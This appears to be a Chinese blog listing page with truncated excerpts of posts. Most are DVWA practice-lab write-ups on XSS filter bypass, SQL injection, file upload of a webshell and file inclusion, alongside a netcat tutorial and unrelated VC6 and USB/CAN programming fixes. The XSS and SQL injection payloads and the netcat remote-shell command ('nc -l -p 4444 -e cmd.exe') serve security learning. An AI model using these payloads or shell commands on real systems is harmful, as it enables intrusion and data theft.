global与$GLOBALS
global与$GLOBALS在php中:$GLOBALS定义:引用全局作用域中可用的全部变量(一个包含了全部全局变量的全局组合数组。变量的名字就是数组的键),与所有其他超全局变量不同,$GLOBALS在PHP代码中任何地方总是可用的,自己可以通过打印$GLOBALS这个变量的结果就知道了。global:在函数产生一个指向函数外部变量的别名变量,而不是真正的函数外部变量。例子:global&获取值的地址,例如&var2为var2为var2为var2的地址。变量可以传值也可以传地
【DVWA】XSS-----------------(Medium)
【DVWA】XSS-----------------(Medium)1、Reflected输入<script>alert(/xss/)</script>查看网页源码:发现过滤了<script>,不慌不慌。。尝试绕过: 大小写混合<ScRiPt>alert(/xss/)</script>拼凑:<scr<script>ipt>alert(/xss/)</script>img标签:<img src
【DVWA】XSS-----------------high+各级别总结
【DVWA】XSS-----------------high+各级别总结1、Reflected输入测试语句查看网页源码:尝试<script>alert(/xss/)</script>,以及其大小写混合、拼凑版本均不成功。尝试其他标签绕过成功:<img src=1 onerror=alert(/xss/)><svg onload=alert(/xss/)>源码分析:preg_replace()函数正则匹配参数中的<script并替换
【瑞士军刀】netcat使用方法
【瑞士军刀】netcat使用方法本文仅用作学习用途,切莫做违法的事情,产生一切后果与本人无关。1、主机间通信服务端开启nc -l -p 4444-l listening-p Portnc IP Port 连接服务端2、远程shellnc -l -p 4444 -e cmd.exe-e 远程连接shell(比较危险)nc IP Port3、文件传输nc -l -p 4444 > file.txt作为服务端开启监听模式,将远程传来的文件导入到本地file.tx
关于SQL注入报错:Illegal mix of collations for operation ‘UNION‘原因剖析与验证
关于SQL注入报错:Illegal mix of collations for operation 'UNION’原因剖析与验证今天练习了一下DVWA的SQL注入模块使用了union注入时报错如下:Illegal mix of collations for operation ‘UNION’payload:' union select table_schema,table_name from information_schema.tables where table_schema='dvwa'#网
【DVWA】SQL Injection-----------------------low
【DVWA】SQL Injection-----------------------low1、初步测试输入单引号报错输入' and 1=1#回显正常,说明存在sql注入输入' or 1=1#,遍历出数据库内容:用order by测出主查询为两个字段2、获取数据库名、用户名、版本用union语句查询数据库名和用户名:payload_1:' union select database(),user()#payload_2:' union select 1,concat_ws('~',dat
【DVWA】SQL Injection------------------------Medium
【DVWA】SQL Injection------------------------Medium1、初步测试发现是post请求于是用burp抓包:输入单引号’报错:输入1 and 1=1回显正常,判断应该是数字型输入1 and 1=2没有回显,说明存在sql注入漏洞2、获取数据库名、用户、版本号order by测出主查询字段数为2payload_1:union select group_concat(database(),user(),version()),1爆出数据库
【DVWA】SQL Injection------------------------------high与impossible源码分析
【DVWA】SQL Injection------------------------------high与impossible源码分析1、初步测试输入1时,会显出ID为1的first name和surname输入’时,报错something went wrong输入1’ and 1=1#时,正常回显:输入1’ and 1=2#时,没有回显也没有报错:所以判断该处可能有sql注入输入1' or 1=1直接遍历出用户信息2、曝数据库名order by 测试出主查询字段数为2pay
【DVWA】SQL Injection(Blid)
【DVWA】SQL Injection(Blid) SQL Injection(Blind)即SQL盲注,与一般的SQL注入的区别是盲注时攻击者通常无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要高于一般的注入。并且现在实战基本都是盲注。盲注分为三类:基于布尔SQL盲注、基于时间的SQL盲注,基于报错的SQL盲注。基本思路:1、先判断是否存在盲注2、利用二分法逐个字母的猜解出数据库名3、猜解数据库的表的数量4、猜解数据库表名5、猜解表中字段名
【DVWA】File Upload
【DVWA】File Upload一、low级别1、测试流程上传一张图片:如图所示,上传成功!上传冰蝎木马:如图所示,上传成功!成功getshell.2、源码分析 <?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //设置文件上
【DVWA】File Inclusion
【DVWA】File Inclusion一、low级别1、测试流程(1)local发现文件名是通过url传递的于是尝试更改page参数内容替换为:..\..\..\..\..\..\..\..\password.txt如图所示,成功爆出根目录下password.txt文件下的内容,此为本地文件包含。(2)remote搭建一个站点,写入一个木马文件将page参数内容替换为木马文件的url地址加上参数x,传入cmd命令:http://10.245.3.237/dvwa/vulner
libusb-win32的使用方法
之前一直找不到适合WIN7下的Tiny6410的USB下载软件,正好这几天开始学习USB,所以打算自己写一个专门用于Tiny6410的WIN7下的USB下载软件。 发现了libusb这个库可以用作无驱USB开发,就是说根本不需要了解Window驱动开发的知识就可以开发USB设备驱动,只需要了解一下USB的相关协议即可。Windows下我几乎不用VS来写程序,或者说我不懂MFC吧,呵呵,所示我用Qt来做界面。好了,进入正题。 首先下载libusb-win32,下载地址:http://sourceforg
vc工程中使用静态库报错“LINK : fatal error LNK1196: invalid or corrupt import object: unknown version”
问题:vc工程中使用静态库报错“LINK : fatal error LNK1196: invalid or corrupt import object: unknown version”。原因:新工程是用VC6.0创建的,但是使用的库时使用vs2010编译的,所以报错。把新工程改为使用vs2010创建即可。...
如何在VC下使用USB-CAN II接口卡操作CAN通信
广州致远电子的USB-CAN II接口卡是比较普遍的CAN采集,测试工具,在进行有关CAN的开发中经常用使用到此设备。然而如何在VC中调用此设备提供的API呢?其实很简单,有关它的API介绍及使用手册在http://www.embedcontrol.com/products/PCI/USBCAN.asp 这个网址可以找到,这里只介绍它的使用示例。1 连接USB-CAN II设备示例代码如下:void Ctbox_CarSimulatorDlg::OnBnClickedBtConnect(){//
vc6.0工程编译时报错“cpp(334) : fatal error C1010: unexpected end of file while looking for precompiled hea”
问题:vc6.0工程编译时报错“cpp(334) : fatal error C1010: unexpected end of file while looking for precompiled hea”
vc6.0工程编译报几十个“undeclared identifier”错误
问题:vc6.0工程编译报几十个“undeclared identifier”错误。原因:上一步操作中在*.cpp文件里添加了一行#include"stdafx.h"但是这行没有放在cpp文件的非空第一行,这行前面还有包含其它的文件,导致前面包含的文件失效。...
vc6.0工程编译时报错“Error spawning cl.exe”
问题:刚才编译还好好的,后来不知道操作什么了,就报“Error spawning cl.exe”。原因:1.开始安装一个vc6.0绿色版,安装时会把vc中使用的一些目录定位到绿色版下。2.后来又装了一个vc6.0完整版,安装的时候vc中使用的一些目录没有更新。3.没删除vc6.0绿色版时,虽然使用完整版编译工程,但是用的还是绿色版中的目录,所以没有问题。4.后来看绿色版多余,把绿色版删除后,因为找不到目录了,就报这个错误。修复:主菜单——工具——选项——目录标签页——修改目录为当前vc对应的
今日推荐
周排行